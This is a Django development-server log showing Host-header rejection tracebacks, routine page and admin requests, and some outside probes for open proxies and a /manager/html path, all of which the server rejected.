    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'google.com:443'. You may need to add 'google.com' to ALLOWED_HOSTS.
Bad Request: /google.com:443
[15/Apr/2023 12:10:03] "CONNECT google.com:443 HTTP/1.1" 400 61863
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[15/Apr/2023 13:12:11] "GET / HTTP/1.0" 400 62188
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /104.244.42.198:443
[15/Apr/2023 13:20:47] "CONNECT 104.244.42.198:443 HTTP/1.0" 400 61910
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /https:/mobile.twitter.com/login
[15/Apr/2023 13:20:47] "GET https://mobile.twitter.com/login HTTP/1.0" 400 62173
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /149.154.167.99:443
[15/Apr/2023 13:20:47] "CONNECT 149.154.167.99:443 HTTP/1.0" 400 61910
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /https:/telegram.org/
[15/Apr/2023 13:20:48] "GET https://telegram.org/ HTTP/1.0" 400 62052
[15/Apr/2023 13:28:35] "GET / HTTP/1.1" 200 7651
Not Found: /manager/html
[15/Apr/2023 13:32:08] "GET /manager/html HTTP/1.1" 404 2467
[15/Apr/2023 13:32:08,653] - Broken pipe from ('46.3.113.238', 56011)
Not Found: /manager/html
[15/Apr/2023 15:15:22] "GET /manager/html HTTP/1.1" 404 2467
[15/Apr/2023 15:15:23,202] - Broken pipe from ('46.3.113.238', 54052)
[15/Apr/2023 15:27:13] "GET / HTTP/1.1" 200 7651
[15/Apr/2023 15:53:18] "GET / HTTP/1.1" 200 7651
[15/Apr/2023 18:08:40] "GET / HTTP/1.1" 200 7651
[15/Apr/2023 18:08:40] "GET /static/css/bootstrap.min.css HTTP/1.1" 304 0
[15/Apr/2023 18:08:40] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 304 0
[15/Apr/2023 18:08:40] "GET /static/css/custom.css HTTP/1.1" 304 0
[15/Apr/2023 18:08:43] "GET / HTTP/1.1" 200 7651
Not Found: /favicon.ico
[15/Apr/2023 18:08:44] "GET /favicon.ico HTTP/1.1" 404 2467
[15/Apr/2023 18:08:47] "GET /admin/ HTTP/1.1" 200 6713
[15/Apr/2023 18:08:47] "GET /static/admin/css/dashboard.css HTTP/1.1" 304 0
[15/Apr/2023 18:08:48] "GET /admin/ HTTP/1.1" 200 6713
[15/Apr/2023 18:08:48] "GET /static/admin/img/icon-changelink.svg HTTP/1.1" 304 0
[15/Apr/2023 18:08:49] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[15/Apr/2023 18:08:49] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
[15/Apr/2023 18:08:51] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[15/Apr/2023 18:08:52] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
Not Found: /manager/html
[15/Apr/2023 18:13:17] "GET /manager/html HTTP/1.1" 404 2467
[15/Apr/2023 18:13:17,812] - Broken pipe from ('46.3.113.238', 59629)
[15/Apr/2023 18:46:33] "GET /admin/kysely/vastaus/ HTTP/1.1" 200 7796
[15/Apr/2023 18:46:33] "GET /admin/jsi18n/ HTTP/1.1" 200 3343
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /149.154.167.99:443
[15/Apr/2023 18:54:52] "CONNECT 149.154.167.99:443 HTTP/1.0" 400 61910
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /https:/telegram.org/
[15/Apr/2023 18:54:52] "GET https://telegram.org/ HTTP/1.0" 400 62052
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /104.244.42.6:443
[15/Apr/2023 18:54:52] "CONNECT 104.244.42.6:443 HTTP/1.0" 400 61888
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /https:/mobile.twitter.com/login
[15/Apr/2023 18:54:52] "GET https://mobile.twitter.com/login HTTP/1.0" 400 62173
Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Traceback (most recent call last):
  File "/usr/local/lib/python3.8/dist-packages/django/core/handlers/exception.py", line 56, in inner
    response = get_response(request)
  File "/usr/local/lib/python3.8/dist-packages/django/utils/deprecation.py", line 135, in __call__
    response = self.process_request(request)
  File "/usr/local/lib/python3.8/dist-packages/django/middleware/common.py", line 48, in process_request
    host = request.get_host()
  File "/usr/local/lib/python3.8/dist-packages/django/http/request.py", line 152, in get_host
    raise DisallowedHost(msg)
django.core.exceptions.DisallowedHost: Invalid HTTP_HOST header: 'jarkkoubu.internal.cloudapp.net:8080'. You may need to add 'jarkkoubu.internal.cloudapp.net' to ALLOWED_HOSTS.
Bad Request: /
[15/Apr/2023 19:16:55] "GET / HTTP/1.0" 400 62304
[15/Apr/2023 19:30:33] "GET / HTTP/1.1" 200 7651
[15/Apr/2023 19:30:33] "GET /static/css/bootstrap.min.css HTTP/1.1" 304 0
[15/Apr/2023 19:30:33] "GET /static/js/bootstrap.bundle.min.js HTTP/1.1" 304 0
[15/Apr/2023 19:30:33] "GET /static/css/custom.css HTTP/1.1" 304 0
Not Found: /favicon.ico
[15/Apr/2023 19:30:33] "GET /favicon.ico HTTP/1.1" 404 2468
